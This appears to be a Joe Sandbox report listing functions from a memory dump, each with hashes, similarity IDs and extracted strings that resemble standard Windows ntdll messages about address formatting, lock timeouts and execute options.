
Function 01762BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
Instruction ID: 0715c8951cf3d83ece13f569c07865cf7debaee774d1d52b7b7e51d49cd6ffa3
Opcode Fuzzy Hash: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
Instruction Fuzzy Hash: 7B90023160950802D65071588418746400597D0301F56C031A0024664DC7558B5577A2

Uniqueness

Uniqueness Score: -1.00%

Function 01762B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
Instruction ID: 01cc52ba4426bd97b257de4e048b0990d000cc8fa79a75e4694c56b58a59a67d
Opcode Fuzzy Hash: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
Instruction Fuzzy Hash: CB90023120550802D60471588808686400597D0301F56C031A6024665ED6658A917232

Uniqueness

Uniqueness Score: -1.00%

Function 01762AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
Instruction ID: 0dc78222d005ba8d6fc12aa139e0184226f1e869cb76721644ed2cc9570cc3f5
Opcode Fuzzy Hash: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
Instruction Fuzzy Hash: 57900225225500020645B558460850B4445A7D6351796C035F14165A0CC6218A655322

Uniqueness

Uniqueness Score: -1.00%

Function 01762AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
Instruction ID: 6f2e07dee98cd8bf884e6ddc7aa62b9783fa0cf27d1e58f7a2f2cbbd6e326979
Opcode Fuzzy Hash: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
Instruction Fuzzy Hash: 679002A1205640924A00B258C408B0A850597E0201F56C036E1054570CC5258A519236

Uniqueness

Uniqueness Score: -1.00%

Function 01762D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
Instruction ID: d1b9f3c2becbd4ca080476e09a9f81f5a6713616d13964468c6d120985579784
Opcode Fuzzy Hash: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
Instruction Fuzzy Hash: 0290022120954442D6007558940CA06400597D0205F56D031A10645A5DC6358A51A232

Uniqueness

Uniqueness Score: -1.00%

Function 01762DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
Instruction ID: 67e486a376a67d209709cf6e86177a22ac7af6c7ac83084a2ed1fe598b90c907
Opcode Fuzzy Hash: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
Instruction Fuzzy Hash: 5290023124550402D641715884086064009A7D0241F96C032A0424564EC6558B56AB62

Uniqueness

Uniqueness Score: -1.00%

Function 01762C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
Instruction ID: 3ca6a72b81cc27c48992b0729550830b8596078c5e18eb089da1a43cab948ca8
Opcode Fuzzy Hash: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
Instruction Fuzzy Hash: 4A90023120550842D60071588408B46400597E0301F56C036A0124664DC615CA517622

Uniqueness

Uniqueness Score: -1.00%

Function 01762CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
Instruction ID: 2d8c70de2c4e6fd9f603f94b09dc5cc648541451a9338d66aa5e7007801324f7
Opcode Fuzzy Hash: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
Instruction Fuzzy Hash: 7C90023120550403D6007158950C707400597D0201F56D431A0424568DD6568A516222

Uniqueness

Uniqueness Score: -1.00%

Function 01762CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
Instruction ID: 88a58601332487e2cc11f22204d0e4de25c0b2b556fee5fef840dfd8f33e2298
Opcode Fuzzy Hash: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
Instruction Fuzzy Hash: 8190022160950402D6407158941C706401597D0201F56D031A0024564DC6598B5567A2

Uniqueness

Uniqueness Score: -1.00%

Function 01762F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
Instruction ID: 012a6eecdc388d8edb39fe489f768273fdac9bf558ef43055c4e1d0831f27bcc
Opcode Fuzzy Hash: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
Instruction Fuzzy Hash: 6F90026121550042D60471588408706404597E1201F56C032A2154564CC5298E615226

Uniqueness

Uniqueness Score: -1.00%

Function 01762FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632

Uniqueness

Uniqueness Score: -1.00%

Function 01762E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233

Uniqueness

Uniqueness Score: -1.00%

Function 01762EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236

Uniqueness

Uniqueness Score: -1.00%

Function 01763010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722

Uniqueness

Uniqueness Score: -1.00%

Function 01763090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2

Uniqueness

Uniqueness Score: -1.00%

Function 017639B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322

Uniqueness

Uniqueness Score: -1.00%

Function 01763D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222

Uniqueness

Uniqueness Score: -1.00%

Function 01763D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322

Uniqueness

Uniqueness Score: -1.00%

Function 01762C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0176293C
___swprintf_l.LIBCMT ref: 0176295E
___swprintf_l.LIBCMT ref: 017629A3
___swprintf_l.LIBCMT ref: 0179A52E

Strings

ffff:, xrefs: 0179A504
::%hs%u.%u.%u.%u, xrefs: 0179A527
::ffff:0:%u.%u.%u.%u, xrefs: 0179A54E
:%u.%u.%u.%u, xrefs: 0179A5B8

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017D24A6
___swprintf_l.LIBCMT ref: 017D24E2
___swprintf_l.LIBCMT ref: 017D257D
___swprintf_l.LIBCMT ref: 017D25A3
___swprintf_l.LIBCMT ref: 017D25C8
___swprintf_l.LIBCMT ref: 017D2608

Strings

ffff:, xrefs: 017D247D, 017D249D
:%u.%u.%u.%u, xrefs: 017D25FF
::ffff:0:%u.%u.%u.%u, xrefs: 017D24DA
::%hs%u.%u.%u.%u, xrefs: 017D249E

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760

Uniqueness

Uniqueness Score: -1.00%

Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
ExecuteOptions, xrefs: 017946A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
Execute=1, xrefs: 01794713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 017F6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 3245c9b7563af3ce16c41bba3c1a241256f08534930d4d83e0f41b77b2d81365
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 85020371508342AFD709CF18C494A6BFBE5EFC8700F548A2DBA998B364DB31E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0176B6BF

Strings

0, xrefs: 0176B695
+, xrefs: 0176B65A
0, xrefs: 0176B66F
-, xrefs: 0176B650

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91

Uniqueness

Uniqueness Score: -1.00%

Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017D214F
___swprintf_l.LIBCMT ref: 017D2172

Strings

%%%u, xrefs: 017D2146
[, xrefs: 017D212B
]:%u, xrefs: 017D2169

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
RTL: Re-Waiting, xrefs: 0179031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01797B8E
RTL: Re-Waiting, xrefs: 01797BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C

Strings

RTL: Resource at %p, xrefs: 017972A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
RTL: Re-Waiting, xrefs: 017972C1

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1

Uniqueness

Uniqueness Score: -1.00%

Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017D238D
___swprintf_l.LIBCMT ref: 017D23B3

Strings

]:%u, xrefs: 017D23AA
%%%u, xrefs: 017D2384

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01767E8B

Strings

+, xrefs: 01767DE8
-, xrefs: 01767DDD

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11

Uniqueness

Uniqueness Score: -1.00%

Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01729191
@, xrefs: 01729175

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
